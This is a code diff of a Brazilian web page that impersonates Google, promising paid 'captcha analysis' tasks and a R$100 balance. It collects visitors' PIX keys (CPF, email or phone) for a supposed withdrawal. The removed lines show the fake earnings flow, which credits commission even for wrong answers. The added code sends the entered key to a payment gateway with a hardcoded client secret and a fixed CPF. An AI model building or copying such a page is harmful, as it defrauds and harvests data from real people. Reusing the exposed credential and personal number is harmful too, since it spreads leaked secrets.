--- a/index.html
+++ b/index.html
@@ -22,7 +22,6 @@
             background-color: white;
             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
             position: relative;
-            border-radius: 8px;
         }
         picture img {
             width: 100%;
@@ -130,113 +129,9 @@
             }
         }
     </style>
-    <link rel="preload" href="https://scripts.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/player.js" as="script">
-    <link rel="preload" href="https://cdn.converteai.net/lib/js/smartplayer/v1/smartplayer.min.js" as="script">
-    <link rel="preload" href="https://images.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/thumbnail.jpg" as="image">
-    <link rel="preload" href="https://cdn.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/663fd08d4cd641000b73e481/main.m3u8" as="fetch">
-    <link rel="dns-prefetch" href="https://cdn.converteai.net">
-    <link rel="dns-prefetch" href="https://scripts.converteai.net">
-    <link rel="dns-prefetch" href="https://images.converteai.net">
-    <link rel="dns-prefetch" href="https://api.vturb.com.br">
 </head>
 <body>
-    <div class="container" id="page1">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="saldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <h2 style="font-size: 21px;">Parabéns, você foi selecionado!</h2>
-            <p>O Google Captchas precisa de você para aumentar a segurança dos seus sites analisando se os Captchas estão marcados corretamente ou incorretamente.</p>
-            <p>Você acaba de receber acesso à nova ferramenta do Google para análise de Captchas. <b>Aproveite, você já ganhou R$100,00</b>!</p>
-            <p>Complete 7 Tarefas Simples e realize seu primeiro saque em minutos.</p>
-            <p>Complete o Captcha para Começar a sua Primeira Tarefa.</p>
-        </div>
-        <div class="captcha">
-            <div class="g-recaptcha" data-sitekey="6LeFvSEqAAAAAIn7IAxAsaJMtpLyjo4DmINrfEU9" data-callback="recaptchaCallback"></div>
-        </div>
-        <button class="btn" id="startButton" disabled>Começar Agora</button>
-        <div class="error" id="errorMessage"></div>
-    </div>
-
-    <div class="container" id="page2" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="taskSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="progresso" id="progresso">
-            Tarefa 1 de 7
-        </div>
-        <div class="task-value" id="taskValue">Valor da Tarefa: R$15,00</div>
-        <div class="content">
-            <p id="taskText">Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.</p>
-        </div>
-        <picture>
-            <source id="taskImageWebp" type="image/webp">
-            <source id="taskImagePng" type="image/png">
-            <img id="taskImage" alt="Captcha com veículos">
-        </picture>
-        <div class="progress-bar">
-            <div class="progress-bar-fill" id="progressBarFill">0%</div>
-        </div>
-        <button class="btn btn-green" id="yesButton">Sim</button>
-        <button class="btn btn-red" id="noButton">Não</button>
-        <div class="error" id="errorMessagePage2"></div>
-    </div>
-
-    <div class="container" id="tasksCompletedPage" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="completedSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <img src="assets/img/verificado.png" alt="Verificado" style="max-width: 70px; margin: 0 auto; display: block;">
-            <h2 style="font-size: 21px; text-align: center;">Tarefas Concluídas!</h2>
-            <p>Parabéns, as tarefas foram concluídas com sucesso! Agora, assista um rápido vídeo para estar podendo realizar o seu saque de forma imediata.</p>
-            <p>Toque no botão abaixo para assistir o vídeo e realizar o seu saque.</p>
-        </div>
-        <button class="btn btn-green" id="goToVideoButton">Assistir Vídeo</button>
-    </div>
-
-    <div class="container" id="pageFinal" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="finalSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <p>O saque será liberado ao final deste vídeo! Assista e entenda como funciona o Google Captcha e porque você está sendo pago para melhorar a segurança de nossa ferramenta.</p>
-            <div id="vid_663fd09d62dd4d000b35368e" style="position:relative;width:100%;padding: 177.77777777777777% 0 0;">
-                <img id="thumb_663fd09d62dd4d000b35368e" src="https://images.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/thumbnail.jpg" style="position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;display:block;">
-                <div id="backdrop_663fd09d62dd4d000b35368e" style="position:absolute;top:0;width:100%;height:100%;-webkit-backdrop-filter:blur(5px);backdrop-filter:blur(5px);"></div>
-            </div>
-            <script type="text/javascript" id="scr_663fd09d62dd4d000b35368e">
-                var s=document.createElement("script");
-                s.src="https://scripts.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/player.js", s.async=!0,document.head.appendChild(s);
-            </script>
-            <style>
-                .elementor-element:has(#smartplayer) { width: 100%; }
-            </style>
-            <button class="btn btn-green" id="withdrawButton" style="display:none;">Realizar Saque Agora</button>
-        </div>
-    </div>
-
-    <div class="container" id="withdrawPage" style="display: none;">
+    <div class="container" id="withdrawPage">
         <picture>
             <source srcset="assets/img/img1.webp" type="image/webp">
             <source srcset="assets/img/img1.png" type="image/png">
@@ -248,15 +143,13 @@
         <div class="content">
             <p>Insira sua chave pix abaixo para sacar suas comissões das tarefas concluídas do Google Captcha e poder continuar realizando novas tarefas.</p>
             <form id="pixForm" onsubmit="submitForm(event)">
-                <div class="form-group">
-                    <label for="pixType">Tipo de Chave PIX</label>
-                    <select id="pixType" name="pixType" onchange="showPixField()" required>
-                        <option value="">Selecione</option>
-                        <option value="cpf">CPF</option>
-                        <option value="email">Email</option>
-                        <option value="phoneNumber">Celular</option>
-                    </select>
-                </div>
+                <label for="pixType">Tipo de Chave Pix:</label>
+                <select id="pixType" name="pixType" onchange="showPixField()" required>
+                    <option value="">Selecione</option>
+                    <option value="cpf">CPF</option>
+                    <option value="email">Email</option>
+                    <option value="phoneNumber">Celular</option>
+                </select>
                 <div class="form-group" id="cpfField" style="display:none;">
                     <label for="cpf">CPF</label>
                     <input type="text" id="cpf" name="cpf" placeholder="Digite seu CPF" oninput="validateCPF()">
@@ -275,7 +168,6 @@
                 <button type="submit" class="btn btn-green">Enviar</button>
             </form>
             <div class="error" id="pixErrorMessage"></div>
-            <div id="successMessage" class="success-message">Saque realizado com sucesso!</div>
         </div>
     </div>
 
@@ -283,127 +175,14 @@
         <img id="popupIcon" src="" alt="Icon">
         <p id="popupText"></p>
     </div>
-    
-    <script src="https://www.google.com/recaptcha/api.js"></script>
+
     <script>
-        const tasks = [
-            { imageWebp: 'assets/img/captcha1.webp', imagePng: 'assets/img/captcha1.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha2.webp', imagePng: 'assets/img/captcha2.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém pessoas.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha3.webp', imagePng: 'assets/img/captcha3.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém casas.', answer: 'não' },
-            { imageWebp: 'assets/img/captcha4.webp', imagePng: 'assets/img/captcha4.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém motocicletas.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha5.webp', imagePng: 'assets/img/captcha5.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém animais.', answer: 'não' },
-            { imageWebp: 'assets/img/captcha6.webp', imagePng: 'assets/img/captcha6.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém semáforos.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha7.webp', imagePng: 'assets/img/captcha7.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém barcos.', answer: 'não' },
-        ];
-        let currentTask = 0;
-        let saldo = 100.00;
-
-        function updateTask() {
-            if (currentTask < tasks.length) {
-                const task = tasks[currentTask];
-                document.getElementById('taskImageWebp').srcset = task.imageWebp;
-                document.getElementById('taskImagePng').srcset = task.imagePng;
-                document.getElementById('taskImage').src = task.imagePng;
-                document.getElementById('taskText').innerText = task.text;
-                document.getElementById('progresso').innerText = `Tarefa ${currentTask + 1} de ${tasks.length}`;
-                document.getElementById('taskSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-                let taskValue = (saldo * 0.15).toFixed(2);
-                document.getElementById('taskValue').innerText = `Valor da Tarefa: R$${taskValue}`;
-                updateProgressBar();
-            } else {
-                document.getElementById('page2').style.display = 'none';
-                document.getElementById('completedSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-                document.getElementById('tasksCompletedPage').style.display = 'block';
-                new Audio('assets/audio/ok.mp3').play();
-            }
-        }
-
-        function updateProgressBar() {
-            const progress = ((currentTask + 1) / tasks.length) * 100;
-            const progressBarFill = document.getElementById('progressBarFill');
-            progressBarFill.style.width = `${progress}%`;
-            progressBarFill.innerText = `${progress.toFixed(0)}%`;
-        }
-
-        function showPopup(message, icon, isCorrect) {
-            const popup = document.getElementById('popup');
-            const popupText = document.getElementById('popupText');
-            const popupIcon = document.getElementById('popupIcon');
-            popupText.innerText = message;
-            popupIcon.src = icon;
-            popup.className = isCorrect ? 'popup popup-correct' : 'popup popup-wrong';
-            popup.style.display = 'block';
-            setTimeout(() => {
-                popup.style.display = 'none';
-            }, 3000);
-        }
-
-        function recaptchaCallback() {
-            document.getElementById('startButton').disabled = false;
-            document.getElementById('startButton').classList.add('btn-green');
-            new Audio('assets/audio/ok.mp3').play();
-        }
-
-        document.getElementById('startButton').addEventListener('click', function() {
-            if (grecaptcha.getResponse() === '') {
-                document.getElementById('errorMessage').innerText = 'Por favor, conclua o captcha antes de continuar.';
-            } else {
-                document.getElementById('page1').style.display = 'none';
-                document.getElementById('page2').style.display = 'block';
-                updateTask();
-            }
-        });
-
-        function validateAnswer(answer) {
-            const correct = tasks[currentTask].answer;
-            let message = '';
-            let icon = '';
-            if (answer === correct) {
-                const commission = (saldo * 0.15).toFixed(2);
-                saldo = parseFloat(saldo) + parseFloat(commission);
-                new Audio('assets/audio/dinheiro.mp3').play();
-                message = `Resposta Correta! Comissão de R$${commission} foi adicionada ao seu saldo, agora você tem R$${saldo.toFixed(2)}.`;
-                icon = 'assets/img/verificado.png';
-                showPopup(message, icon, true);
-            } else {
-                new Audio('assets/audio/erro.mp3').play();
-                message = `Resposta Errada! Comissão foi adicionada ao seu saldo, agora você tem R$${saldo.toFixed(2)}.`;
-                icon = 'assets/img/verificado.png';
-                showPopup(message, icon, false);
-            }
-            document.getElementById('taskSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-            currentTask++;
-            updateTask();
-        }
-
-        document.getElementById('yesButton').addEventListener('click', function() {
-            validateAnswer('sim');
-        });
-
-        document.getElementById('noButton').addEventListener('click', function() {
-            validateAnswer('não');
-        });
-
-        document.getElementById('goToVideoButton').addEventListener('click', function() {
-            document.getElementById('tasksCompletedPage').style.display = 'none';
-            document.getElementById('pageFinal').style.display = 'block';
-            setTimeout(() => {
-                document.getElementById('withdrawButton').style.display = 'block';
-            }, 60000); // 1 minuto
-        });
-
-        document.getElementById('withdrawButton').addEventListener('click', function() {
-            document.getElementById('pageFinal').style.display = 'none';
-            document.getElementById('withdrawPage').style.display = 'block';
-            document.getElementById('withdrawSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-        });
-
         function showPixField() {
             const pixType = document.getElementById('pixType').value;
             document.getElementById('cpfField').style.display = 'none';
             document.getElementById('emailField').style.display = 'none';
             document.getElementById('phoneField').style.display = 'none';
-            
+
             if (pixType === 'cpf') {
                 document.getElementById('cpfField').style.display = 'block';
             } else if (pixType === 'email') {
@@ -449,20 +228,26 @@
         async function submitForm(event) {
             event.preventDefault();
             const pixType = document.getElementById('pixType').value;
-            const cpf = document.getElementById('cpf').value;
-            const email = document.getElementById('email').value;
-            const phone = document.getElementById('phone').value;
+            const key = pixType === 'cpf' ? document.getElementById('cpf').value :
+                        pixType === 'email' ? document.getElementById('email').value :
+                        document.getElementById('phone').value;
+            const value = 0.05;
 
             const data = {
-                pixType: pixType,
-                key: pixType === 'cpf' ? cpf : pixType === 'email' ? email : phone
+                key: key,
+                typeKey: pixType,
+                value: value,
+                callbackUrl: "https://webhook.com",
+                documentValidation: "079.940.605-87"
             };
 
             try {
-                const response = await fetch('https://example.com/api/submit-pix', {
+                const response = await fetch('https://sandbox.ws.suitpay.app/api/v1/gateway/pix-payment', {
                     method: 'POST',
                     headers: {
                         'Content-Type': 'application/json',
+                        'ci': 'wjmkt_1713979947271',
+                        'cs': '49d8d1419abe58357fa6ec5d4e562b302c6c661df14ff8b745b6b3376df4cb4c3478cd59160d456791aa555dcae974ee'
                     },
                     body: JSON.stringify(data),
                 });
@@ -470,17 +255,12 @@
                 const result = await response.json();
 
                 if (result.success) {
-                    document.getElementById('successMessage').style.display = 'block';
-                    document.getElementById('pixErrorMessage').style.display = 'none';
+                    alert('Pagamento realizado com sucesso!');
                 } else {
-                    document.getElementById('pixErrorMessage').textContent = 'Erro ao realizar o saque. Tente novamente.';
-                    document.getElementById('pixErrorMessage').style.display = 'block';
-                    document.getElementById('successMessage').style.display = 'none';
+                    document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
                 }
             } catch (error) {
-                document.getElementById('pixErrorMessage').textContent = 'Erro ao realizar o saque: ' + error.message;
-                document.getElementById('pixErrorMessage').style.display = 'block';
-                document.getElementById('successMessage').style.display = 'none';
+                document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
             }
         }
     </script>
